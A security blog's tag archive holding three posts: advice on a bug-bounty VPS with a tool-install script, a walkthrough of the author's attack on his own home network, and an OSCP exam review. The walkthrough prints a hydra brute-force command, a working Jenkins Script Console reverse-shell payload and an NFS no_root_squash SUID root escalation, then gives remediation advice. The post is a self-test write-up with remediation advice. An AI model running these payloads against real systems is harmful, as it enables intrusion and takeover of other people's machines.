Tag Archives: cybersecurity

You should use a VPS for bug bounty hunting

Why should you use a VPS?

For one, it’ll keep your IP address from being banned by certain providers. How would it feel to wake up one day and not being able to access certain sites because your IP has been blacklisted? If you use a VPS, this isn’t much of an issue. You can just change out the IP from the VPS provider. It may be a littler harder to change your home IP address.

For two, it makes tool installation easier and faster. On Linode, I have a lengthy script that I run when I’m starting up a new box. The script sets up everything I need for bug bounty hunting. It makes tearing down a box and bringing it up a new one simple and quick.

Another reason you may want a cloud-based box running is for server capabilities. For example if you’re testing out some sort of XSS/XXE/etc. and you need a server to host a payload, your bug bounty box can serve double duty. Additionally, some hunters maintain giant databases of scraped webpages, nmap scans, targets and their subdomains, and on and on and on. But perhaps my favorite usage of a dedicated bug-bounty box is hosting your own semi-permanent Burp Collaborator server as described here.

I use this in my day-to-day exploitation because I don’t want to host this stuff at home, which exposes my personal IP address and whatever ports I have open to the general public, which I try to avoid.

Here is a small example of a script that I run. My script is significantly larger, but this is a decent start.

See the latest version on my github page.

#!/bin/bash
# for use with Ubuntu 20.04
# some security tools to get started
# use this to setup new bug bounty box
# use at your own risk

# check if running as root
if [ "$EUID" -ne 0 ]
	then echo "Run as root, please!"
	exit
fi

mkdir sectools
cd sectools

apt update -y && apt upgrade -y

# install some packages and tools that are used regularly
apt install \
apt-transport-https \
ca-certificates \
curl \
gnupg-agent \
software-properties-common \
net-tools \
nmap \
john \
hashcat \
python3-pip \
wfuzz \
nikto \
gobuster \
masscan \
ruby-full \
ruby-railties \
wireguard \
nfs-common \
hydra \
cewl \
mlocate

# evil winrm
gem install evil-winrm

# powershell
snap install powershell --classic

# amass
curl -s https://api.github.com/repos/OWASP/Amass/releases/latest | grep "browser_download_url.*linux_amd64.zip" | cut -d : -f 2,3 | tr -d \" | wget -i -
unzip amass* 
chmod +x ./amass_linux_amd64/amass 
mv ./amass_linux_amd64/amass /usr/bin/


# nuclei
curl -s https://api.github.com/repos/projectdiscovery/nuclei/releases/latest | grep "browser_download_url.*linux_amd64.tar.gz" | cut -d : -f 2,3 | tr -d \" | wget -i -
tar xzf nuclei* nuclei
chmod +x nuclei
mv nuclei /usr/bin/

# httpx
curl -s https://api.github.com/repos/projectdiscovery/httpx/releases/latest | grep "browser_download_url.*linux_amd64.tar.gz" | cut -d : -f 2,3 | tr -d \" | wget -i -
tar xzf httpx* httpx
chmod +x httpx
mv httpx /usr/bin/

# subfinder
curl -s https://api.github.com/repos/projectdiscovery/subfinder/releases/latest | grep "browser_download_url.*linux_amd64.tar.gz" | cut -d : -f 2,3 | tr -d \" | wget -i -
tar xzf subfinder* subfinder
chmod +x subfinder
mv subfinder /usr/bin/

#aquatone setup
curl -s https://api.github.com/repos/michenriksen/aquatone/releases/latest | grep "browser_download_url.*linux_amd64-*" | cut -d : -f 2,3 | tr -d \" | wget -i -
unzip aquatone* aquatone
chmod +x aquatone && cp aquatone /usr/bin

# FFUF
curl -s https://api.github.com/repos/ffuf/ffuf/releases/latest | grep "browser_download_url.*linux_amd64.tar.gz" | cut -d : -f 2,3 | tr -d \" | wget -i -
tar xzf ffuf* ffuf
chmod +x ffuf
mv ffuf /usr/bin/

# getallurls (gau)
curl -s https://api.github.com/repos/lc/gau/releases/latest | grep "browser_download_url.*linux_amd64.tar.gz" | cut -d : -f 2,3 | tr -d \" | wget -i -
tar xzf gau* gau 
chmod +x gau 
mv gau /usr/bin

cd ..
echo "Don't forget to install metasploit, setoolkit, hexeditor, burp suite, wireshark, etc"
echo "all finished!"

You can add whatever you want to this script, and then spin up your bug bounty box with one script. I have my script set my hostname, bashrc, environment variables, download repos from git, install docker, install go, etc.

So who should you use for your VPS? I’ve used AWS, Azure, Digital Ocean, and Linode, and I find Linode to be the best. Just try them all out, and I think you’ll agree with me. AWS and Azure are both massive in size. Azure seems to take way to long to do certain tasks, so that is frustrating. The site just seems slow in general. AWS is better than Azure.

Linode is where it is at. It is quick. The interface is simpler and easier to use than all of the above, and it is cheaper than all of the above. Check it out using my referral link, if you’re interested. That link will give you a $100/60 day credit, so you don’t want to sign up without one. You can just try it out for free and see what you think.

Hacking My Home Network

Home Network

Hacking my Home

> Initial Access

So, I had to fake the initial access portion of this pentest. I only have one externally facing service open on my firewall, and it doesn’t allow logins, so I’m fairly secure in that regard. I also run an intrusion detection system on my LAN, so hopefully I’ll be made aware of any intrusions.

I have a Raspberry Pi 3 (RP3) on which I run Retropie to play old games. Let’s say I downloaded a malicious ROM that was actually a RAT, and now the attacker (me) has access to the RP3 as the pi user.

ccf2c614ef7982378dceb728288b9bb0.png
14f32e4dd0e76cc9682d7417dac76060.png

The first step in this attack would likely be to map the internal network with nmap. Unfortunately, nmap is not installed.

What do I do in this case? Well, I could use this bash script to do a rudimentary ping sweep of the network.

for i in {1..254} ;do (ping -c 1 192.168.1.$i | grep "bytes from" &) ;done
80b755fc3055e63b734dcf122c0a0f5b.png

That gives us a list of IPs to work on for lateral movement. But what else can we do? Let’s try ARP:

That gives us mostly the same results, but if you look closely, there are a couple of devices that didn’t show up in the ping sweep. If we look closely at the hostnames, you’ll see a lot of IoT devices and not many “real” PCs.

But, as we already know, this is a RP running Retropie. Maybe there are default credentials for the Retropie, and we can use them to install stuff.

https://www.google.com/search?channel=fs&client=ubuntu&q=retropie+default+credentials

Looks like the default creds are pi:raspberry. And it looks like they will work for us. Let’s install nmap and truly map the network.

First we will do a simple nmap scan and skip port scanning.

831d06d508eabf4eb9d8ba00a50b60cd.png

This output is a little more clear than the ARP scan. We can see a couple of interesting hostnames – desktop1, parrot, and unifi. The first thing that comes to mind when I see parrot is ParrotOS, the pentesting operating system. And I’m assuming desktop1 is a desktop PC. We also have some IPs without hostnames, which we can investigate as needed.

Additionally, we see a bunch of IoT devices present, which we won’t spend time on now, but I’m planning an article in the future focusing on security issues associated with them.

> Lateral Movement

Let’s start with an nmap scan of parrot:

We have a couple of ports there that could come in handy, if we happen to find any usernames. This is a home network, so we likely can spray/brute force without being detected (except, I’d actually detect this on my LAN with my IDS). Make note of this scan and move on to nmap 186 desktop1:

e999378aa925320963a531b0330897cd.png

That’s strange, it doesn’t seem like the desktop has many ports open. Now, how about unifi, 192.168.1.191. It turns out this is actually my desktop PC.

sudo nmap -A -p- 192.168.1.191 | tee nmap-desktop.txt

Turns out there was A LARGE NUMBER of open ports on my desktop, which was expected. I run some services on my desktop PC, which actually serves multiples roles around my home as a media server, general workstation, development server, VM/container host, etc. So let’s grep that file for open ports

560bcd48bec0c481f3f0ee76f89b08c8.png

Where to start? Well, the services that stick out the most to me are port 2049, which is probably an NFS share, all the 8XXX ports and 9080, which all seem to be webservers of some sort. I’m going to access these locally, but if this were real life, I’d have to setup proxychains/SSH/etc to use the RP as a pivot box. Let’s check the NFS share first.

showmount -e 192.168.1.191
044f0a1eb851156589ec088deb841c9c.png

Looks likes we have some shares there. Let’s mount them.

31cdf3f0c369130ff401e8146d1f2f58.png

Jackpot! We have some very sensitive directories here – even a file named username.txt. We are going to avoid enumerating this data, but if this was a real pentest, you can be assured there are things to be found here. Let’s move on for now.

Sure enough, port 8443 is a Unifi login point. Port 8080 also redirects here.

66fd078227e76497b13bd028ff3a5c0d.png

We can explore this down the road, if needed, but let’s take a look at some more stuff. Ports 8880 and 8843 give me 400 error codes.

b68b02a6f270ed8c9416efd957a44b4c.png

And port 9080 seems to be Jenkins, hmm.

f457b858e5df66667966098250ca3da8.png

One thing I know about Jenkins is that it will start up with a default username of admin, unless you change it. Maybe we can crack it with hydra? After all, it is a local and behind a firewall. Maybe the user (me) is lax on security on their local network. Good thing I’m administrator on the Raspberry Pi. Now, if we are going to brute force this password, we need get the details of the request.

d8829b8b1bc2358cc5f6290829ce5714.png
d850f74dea1046649edf8bd619ea19a8.png

With the information in those headers and body, we can create a hydra command to brute force the password, using this list:

7d53cf53495302e186087c54a86ad9a8.png

Here is the hydra command:

hydra -l admin -P /home/pi/darkweb2017-top10000.txt 192.168.1.191 -s 9080 http-post "/:j_username=admin&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid"

And success! Maybe I should have tried the simple ones manually, first, but oh well. In a real pentest we may consider password spraying all the login pages and services that we can find.

9ad1119a9a251aad0a024615c883b725.png
08db9fa78fdaa84f887a7c762a16e6b8.png

Looks like there is one job present that we would explore in a real pentest. This may give us some info to move laterally on this network, or even other networks, if this is some sort of pipeline for an external site (which it actually is, https://nuke-api.com). For now, we can use the tried and true method of obtaining a reverse shell from the Jenkins Script Console:

6503fd18628aec848fa6e134989b2ca9.png
String host="192.168.1.201";
int port=4444;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Then start the listener on the attacking box, hit ctrl-enter in Jenkins script console, and voila!

b9c3b99adba89e5a2c1c0cb17d78c2a1.png

Now we have the user ‘user’ on the desktop PC.

> Privilege Escalation

First, we get ourselves a better shell.

Lets get rid of that command echoing:

210e4ba531004cd467a49e2117c6180f.png

You see those data folders? That’s interesting because those are the same ones we saw that were shared with NFS earlier. Let’s get some more information about them.

df1828fa0016d2e78810487e0769145c.png

Uh, oh. I think we found a way to elevate our privileges. That ‘no_root_squash’ export option is a security concern. Basically, it allows remote users to mount the drive and do things as root.

So let us go back to the RP3.

796dc9c021fed5826465999153690658.png

We’ve mounted the drive again (disregard the obviously sensitive files and directories, we aren’t focusing on that aspect today).

From here we can do one of my favorite privilege escalations to obtain root on the desktop. Now, if the boxes were the same architecture, we could, on the RP3, copy /bin/bash to the mount and set the SUID bit. Unfortunately, that will not work in our case, so we will have to use our brains.

7c4a8db4ce17a06d94e0ff04a212e142.png

First, create this simple C program to elevate to root. Then, on the desktop, compile the program. Maybe we could have transferred the desktop’s bash binary to this directory, and then enable the SUID bit from the RP3, but I decided to do it another way.

gcc getroo.c -o getroot

Then, back on the RP3, run the following command to make the file executable and the SUID bit active.

sudo chmod root:root getroot
sudo chmod +sx getroot

Now, back on the desktop

b3b1c100d7cea8c04e3ff93324137903.png

We can see the file is now there with the SUID bit set, so we run it, and now we are root!

> Analysis and Remediation

Phew! Where to start? This pentest exploited a litany of security issues.

To start, if the initial access was obtained from the download of a malicious file, some antivirus may have helped. Better yet, train your users to not download strange files. After all, antivirus can be bypassed.

Next, let’s talk about default/basic credentials. We ran into this twice on this engagement – once on the RP3, which allowed us root privileges to install software to advance our attack, and then once again default credentials allowed us to log into Jenkins.

Once we got into Jenkins, we used built in functionality to get us access to the desktop box. This could have been remedied, or alleviated by disabling the Jenkins script console, or running Jenkins with a different user. We also could run Jenkins in a container (which is what I actually do, IRL). That way, the malicious actor would have to break out of the container in order to obtain direct access to the box. As long as the container is properly configured, it may be very difficult, or impossible to break out of.

Ultimately, the misconfiguration of NFS shares is what allowed us to root the desktop PC. The shares did not need to be shared with no_root_squash. This options allows a root user on another box to create files that will remained owned by the root user instead of being owned by a user named ‘nobody.’ This is a security feature that should almost never be bypassed.

That is all I got. Please don’t hack me.

Disclaimer: My network is not actually this insecure.

OSCP Exam Review

offsec
watch out for that mysterious hacker standing in the doorway!

I took the OSCP (Offensive Security Certified Professional) some time ago, but recently enough. If you’re reading this, you probably know of the exam, but for those that don’t, here is a short explanation.

Basically, it’s a cybersecurity exam where you’re given access to a computer network containing five machines (computers). In the first 24 hours of the exam, your goal is to break into (or root, as we say) as many of these machines as possible. The second 24 hours is reserved for writing a report detailing the results of your penetration test. It’s supposed to mimic, in some fashion, a “real life” penetration test.

The test has a reputation of being really hard. It’s commonplace for people to not sleep much in the 48 hours they’re allotted to hack and write. And, after all, it isn’t an exam where you can just read a book, or memorize multiple choice questions – you actually have to know how to hack. Offensive Security, the company that runs the program, actually watches you the whole time via webcam.

With that said, I feel that the difficulty of the exam is overstated. That isn’t because I’m some sort of IT professional that has been doing this for 10 years professionally. I don’t work in IT, software engineering, or anything even tangentially related to computers. Nor do I have a degree in IT or Computer Science. I think people have issues with the exam for one main reason.

I think many people come into it it way unprepared. And this may seem obvious, since if they were prepared, they would have passed, but please stick with me. They signed up for the OSCP, rooted a dozen boxes in the lab that you’re given access to, did a bit of the exercises in the manual, and called it a day, thinking they knew what they were doing because they’ve been working in IT for a decade. Well, let me tell you, they can always throw some software or web app at you that you’ve never even seen before, which is what happens to me weekly on HTB. However, the methods of attack will all be the same. In fact, I’d say the exam boxes were EASIER than easy boxes on HTB – especially the newer easy boxes.

In my opinion, you need root >90% of the lab machines, and then be active on HTB for a few months to be fully prepared for this exam. You need to make box enumeration and privilege escalation second nature. You need to have notes, too. They can be very helpful. You need to be able to rip out a custom buffer overflow exploit in python in less than an hour. You need to LEARN HOW TO GOOGLE. If you do this you’ll be golden.

I went in expecting Cyber World War 3, and was laughing and confused after about 5 hours when I had enough points to pass.

And then, once you pass, you can start in on something harder – the Advanced Web Attacks and Exploitation course to get the Offensive Security Web Expert certification also created by Offensive Security. That one is a 48 hours online exam followed by 24 hours to write a report, and supposedly much harder.

Good luck!